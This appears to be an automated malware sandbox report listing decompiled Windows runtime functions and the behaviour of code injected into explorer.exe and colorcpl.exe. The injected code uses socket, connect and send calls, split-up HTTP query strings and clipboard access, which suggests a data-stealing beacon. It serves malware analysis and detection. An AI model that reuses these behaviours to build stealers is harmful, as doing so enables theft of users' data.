0x1e471ffc
0x1e472001
0x1e47200d
0x1e47201b
0x1e472028
0x1e47202e
0x1e472035
0x1e472038
0x1e47204c
0x1e472052
0x1e472053
0x1e472054
0x1e472055
0x1e472069
0x1e47206c
0x1e47206e
0x1e472079
0x1e472087
0x1e47209c
0x1e47209c
0x1e47202a
0x1e47202a
0x1e47202a
0x1e4720a5

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f69c954eea6c3f8ec6af87ea8f4fdc6b745dc70bddd99a598fa8ef5e677e3a8
Instruction ID: 3ebd6286762f97805d0898d12143836c04d6565cd6a34d39fd6b9f7e305a367b
Opcode Fuzzy Hash: 6f69c954eea6c3f8ec6af87ea8f4fdc6b745dc70bddd99a598fa8ef5e677e3a8
Instruction Fuzzy Hash: 2721A233A104259BDB18CF7CC8055A6F7E6FF9C21032A467BD912EB265EA70BD11CAC4

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DABD8, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1E3DABD8(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				signed char _t22;
				intOrPtr _t31;
				signed char _t34;
				signed char _t42;
				unsigned int _t44;
				void* _t49;
				signed int* _t53;

				_push(__ecx);
				_t49 = __ecx;
				_t18 = __ecx + 0xc0;
				_t31 =  *((intOrPtr*)(_t18 + 4));
				while(_t31 != _t18) {
					_t9 = _t31 - 8; // -8
					_t53 = _t9;
					if( *(_t49 + 0x4c) != 0) {
						_t44 =  *(_t49 + 0x50) ^  *_t53;
						 *_t53 = _t44;
						_t38 = _t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44;
						if(_t44 >> 0x18 != (_t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44)) {
							E1E45FA2B(_t31, _t49, _t53, _t49, _t53, __eflags, _t38);
						}
					}
					_t34 =  *_t53 & 0x0000ffff;
					_t18 = 0x200;
					_t42 = _t34 >> 8;
					if(_t34 <= 0x200) {
						__eflags =  *(_t49 + 0x4c);
						if( *(_t49 + 0x4c) != 0) {
							_t53[0] = _t53[0] ^ _t42 ^ _t34;
							_t18 =  *(_t49 + 0x50);
							 *_t53 =  *_t53 ^ _t18;
							__eflags =  *_t53;
						}
						break;
					}
					_t22 = _t53[0];
					if((_t22 & 0x00000008) != 0) {
						__eflags =  *(_t49 + 0x4c);
						if(__eflags != 0) {
							_t53[0] = _t22 ^ _t42 ^ _t34;
							 *_t53 =  *_t53 ^  *(_t49 + 0x50);
							__eflags =  *_t53;
						}
					} else {
						E1E3DAC7B(_t49, _t53);
					}
					_t31 =  *((intOrPtr*)(_t31 + 4));
					_t18 = _t49 + 0xc0;
				}
				return _t18;
			}

0x1e3dabe0
0x1e3dabe4
0x1e3dabe6
0x1e3dabec
0x1e3dac0c
0x1e3dac14
0x1e3dac14
0x1e3dac17
0x1e3dac1c
0x1e3dac20
0x1e3dac2c
0x1e3dac33
0x1e419f40
0x1e419f40
0x1e3dac33
0x1e3dac39
0x1e3dac3c
0x1e3dac44
0x1e3dac4b
0x1e3dac5f
0x1e3dac63
0x1e3dac6c
0x1e3dac6f
0x1e3dac72
0x1e3dac72
0x1e3dac72
0x00000000
0x1e3dac63
0x1e3dac4d
0x1e3dac52
0x1e3dabf1
0x1e3dabf5
0x1e3dabfb
0x1e3dac01
0x1e3dac01
0x1e3dac01
0x1e3dac54
0x1e3dac58
0x1e3dac58
0x1e3dac03
0x1e3dac06
0x1e3dac06
0x1e3dac7a

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
Instruction ID: 1d8c50fba743eedb66e11bc48494269caa5c2af653b7eeacdb65740a0c3a17a7
Opcode Fuzzy Hash: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
Instruction Fuzzy Hash: 192124322007469BCB288F2AC5906E2B7E6FF89314F90831AD4C5C7681D320B80BDBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3B841F, Relevance: .1, Instructions: 64
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E1E3B841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E1E3E9810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}

0x1e3b842f
0x1e3b8448
0x1e3b844e
0x1e3b8459
0x1e3b845b
0x1e3b8464
0x1e409ac3
0x1e409ac3
0x1e409ac5
0x1e409acb
0x00000000
0x00000000
0x1e409acd
0x1e409acd
0x1e409ad1
0x1e409ae9
0x1e3b846a
0x1e3b8475
0x1e3b8479
0x1e3b847c
0x1e3b8481
0x1e3b8482
0x1e3b849a

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction ID: 5a997e8936a07a3d5e6ed4091dd66b87fb4ad1fcba47ec51653e3f89f3374aeb
Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction Fuzzy Hash: 2C21A276E00119CBCB14CFA9C58068AF3F9FB8C350F664565E909B7740C630AE04CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E1E3D645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e49d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E3EFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E3C2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E3BFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e49b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E3EB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x1e3d645b
0x1e3d6463
0x1e3d646d
0x1e3d6475
0x1e3d647a
0x1e3d647e
0x1e3d6480
0x1e3d648c
0x1e3d6490
0x1e3d6495
0x1e3d6498
0x1e3d649b
0x1e3d649f
0x1e3d64a1
0x1e417c07
0x1e417c09
0x1e417c0c
0x00000000
0x1e3d64a7
0x1e3d64a7
0x1e3d64aa
0x1e417bf7
0x1e417c00
0x00000000
0x1e417bf9
0x1e417bf9
0x1e417bf9
0x1e3d64b0
0x1e3d64b0
0x1e3d64b2
0x1e3d64b2
0x1e3d64b3
0x1e3d64ba
0x1e3d6553
0x1e3d655e
0x1e3d6566
0x1e3d656c
0x1e3d6575
0x1e3d657f
0x1e3d6585
0x1e3d6588
0x1e3d6588
0x1e3d64c7
0x1e3d64cb
0x1e3d64ce
0x1e3d64d3
0x1e3d64da
0x1e3d64e5
0x1e3d64ed
0x1e3d64f1
0x1e3d64f5
0x1e3d64f6
0x1e3d64fa
0x1e3d6502
0x1e3d6503
0x1e3d6504
0x1e3d6507
0x1e3d651a
0x1e3d6524
0x1e3d6524
0x1e3d6526
0x1e3d6526
0x1e3d64aa
0x1e3d652c
0x1e3d652d
0x1e3d652e
0x1e3d6539

APIs

RtlDebugPrintTimes.NTDLL ref: 1E3D651A

Strings

0, xrefs: 1E3D64E5
0, xrefs: 1E3D64FA

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
Instruction ID: c6ce05866ed0a428c24516c3888f241f737f9b2715814094d67d7a417fdcff41
Opcode Fuzzy Hash: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
Instruction Fuzzy Hash: 52415BB26047469FC301CF28C484A1ABBE5BB8D714F454A6EF899DB301D731EA49CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1E43FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E1E43FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E3ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E435720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E435720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x1e43fdda
0x1e43fde2
0x1e43fde5
0x1e43fdec
0x1e43fdfa
0x1e43fdff
0x1e43fe0a
0x1e43fe0f
0x1e43fe17
0x1e43fe1e
0x1e43fe19
0x1e43fe19
0x1e43fe19
0x1e43fe20
0x1e43fe21
0x1e43fe22
0x1e43fe25
0x1e43fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E43FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E43FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E43FE01

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
Instruction ID: d0965ee7a8980bc73e418a959f569537691f8a2ee80af317fb6936aed78332d2
Opcode Fuzzy Hash: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
Instruction Fuzzy Hash: 22F0F636500551BFDB200A45EC02F63BB5AEB88731F250316F668566E1DB62F86096F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 3388 Parent PID: 3112 explorer.exeCOMMON

Executed Functions

Function 0613D302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 0613D4AE
setsockopt.WS2_32 ref: 0613DCB2
recv.WS2_32 ref: 0613DCDA

Strings

GET , xrefs: 0613D768
Co, xrefs: 0613D726
&br=, xrefs: 0613D979
ose, xrefs: 0613D746
tion, xrefs: 0613D736
dat=, xrefs: 0613D6A4
nnec, xrefs: 0613D72E
: cl, xrefs: 0613D73E
&un=, xrefs: 0613D948
=, xrefs: 0613D8D0

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
API String ID: 1564272048-2976227712
Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction ID: 89ff0d0dccddb16fa40bc8bb1fc962a280235d007fb7bb3fc2ea98c76d2759b5
Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction Fuzzy Hash: 0F627170A18B588BDBA9EF68D8847EAB7E1FF94300F50492ED49BC7245DF30A545CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06136EB2, Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 06136F09

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: ClipboardOpen
String ID:
API String ID: 2793039342-0
Opcode ID: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
Instruction ID: fc768965ab587e47d9e7e78d3f388a4911008e8efa9d46e3a5b0b89870036001
Opcode Fuzzy Hash: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
Instruction Fuzzy Hash: FC115230610D199FDBD5AB2988AC3BA32D4FB48306F5854B8950FCA1D1DF75C986CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 06139EFE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 06139F57

Strings

esoc, xrefs: 06139F22
ket, xrefs: 06139F2A
clos, xrefs: 06139F1A

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
Instruction ID: 0e56885ae56f26197a6030b08c623b5ed4c6de244359ab08182232c9f2fdc01c
Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
Instruction Fuzzy Hash: B1F0907021CB089FCBC0DF1894887E9B7E0FB89314F54056DF48ECA204CB7885428783

Uniqueness

Uniqueness Score: -1.00%

Function 06139F02, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 06139F57

Strings

esoc, xrefs: 06139F22
ket, xrefs: 06139F2A
clos, xrefs: 06139F1A

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
Instruction ID: ea7e522089a118bfa2e2c2d52de4d47e7e28ceb9485b8de67870bc0dcf3b5dab
Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
Instruction Fuzzy Hash: CFF01770618B089FCBC4EF18D4C87A9BBE0FB89314F64556DB44ECA244CB7889468B82

Uniqueness

Uniqueness Score: -1.00%

Function 06139E7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 06139EE1

Strings

ect, xrefs: 06139EB1
conn, xrefs: 06139EAA

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction ID: 378da2f94f5ed93bff42fdb126f62b4221f68ee8feaba5f442cc15765f13850c
Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction Fuzzy Hash: B4017C70618A088FDBC4EF1CE088B15BBE0FB58314F1545AEE80DCB227CBB0C8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 06139E82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 06139EE1

Strings

ect, xrefs: 06139EB1
conn, xrefs: 06139EAA

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction ID: 50bb8ddf37c9f6c29e7b59a73070eb0363fb4682b103fef436b86c4f703cd287
Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction Fuzzy Hash: 1C012C71618A188FDBC4EF5CE488B15B7E0FB58314F1545AEA80DCB226CBB0C8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 06139DF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 06139E63

Strings

send, xrefs: 06139E2A

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction ID: 084525cedfaab7ac944e86775cd04c97fff155170f0ab97ba094f973863f2dbf
Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction Fuzzy Hash: E3012130918A188FCBC4EF5CA089B1577E0EB98324F1545AE984DCB266CB70D882CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 06139E02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 06139E63

Strings

send, xrefs: 06139E2A

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction ID: a1997b9754683be43409e06fb7f4ced5531e9228f14a14b195f4365ba6c3e731
Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction Fuzzy Hash: 16010C30618A188FDBC8EF1CA488B15B7E0EB9C324F1545AE984DCB266DB70D881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06139D02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 06139D61

Strings

sock, xrefs: 06139D29

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction ID: bfddae578a2cb9cbb3a4b42669b3f5b04c5dc00adaae7e6c4fd630ee020bb61e
Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction Fuzzy Hash: D6014F70658A188FDB84EF1CE048B14BBE0FB98314F1545AEE84DDB376D7B0C9418B85

Uniqueness

Uniqueness Score: -1.00%

Function 06135272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 061352BD

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction ID: a60783d1a2eb42ef44cf34e02ad6b52e7bfa6a1beb728a6639163ef1290f6d6d
Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction Fuzzy Hash: F3214434A14B5D8FDBD4EF6884D43A9B7A2FB94700F48067E991ECB106CB749541CB92

Uniqueness

Uniqueness Score: -1.00%

Function 06136EAA, Relevance: 1.6, APIs: 1, Instructions: 64clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 06136F09

Memory Dump Source

Source File: 00000006.00000002.482441319.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false

Similarity

API ID: ClipboardOpen
String ID:
API String ID: 2793039342-0
Opcode ID: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
Instruction ID: 933d2e5390f11609b3c87d20e8589b312c31edfa160e781d0a69e661f093f682
Opcode Fuzzy Hash: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
Instruction Fuzzy Hash: 3E117030610E199FDBD5AB2988AC7B93294FB48306F5C54B8940FCA1C2DF75C986CBE0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: colorcpl.exe PID: 2988 Parent PID: 3388 colorcpl.exeCOMMON

Executed Functions

Function 009681C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00963B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00963B97,007A002E,00000000,00000060,00000000,00000000), ref: 0096820D

Strings

.z`, xrefs: 009681FD, 00968208

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 7e74a96fed4db09f279296a54391cc557e158adfcf7b426aa5488fd9180d1ca0
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: C5F0B6B2200108ABCB08CF88DC95EEB77ADAF8C754F158248FA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00968270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00963D52,5E972F59,FFFFFFFF,00963A11,?,?,00963D52,?,00963A11,FFFFFFFF,5E972F59,00963D52,?,00000000), ref: 009682B5

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 1fe8bd1d138efbea6651b448331d5e8ee22ac39d2f083b0d8cab6dc76e4d04ac
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 10F0A4B2200208ABCB14DF89DC95EEB77ADAF8C754F158648BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009683A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00952D11,00002000,00003000,00000004), ref: 009683D9

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 2aeeb08284378460d33613e32239b7ebe09b8a62dc7bfce1c31368bab191c429
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: C5F01CB1200208ABCB14DF89CC81EA777ADAF88750F118548FE0897241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 009682F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00963D30,?,?,00963D30,00000000,FFFFFFFF), ref: 00968315

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 90b72bef06bc1b81bec65e0bf75ee5d1a324eb38d8f903c2134cbbbeff1e5579
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: CDD012752002146BD710EF98CC45F97775CEF44750F154555BA185B282C930F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04C495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C495DA

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
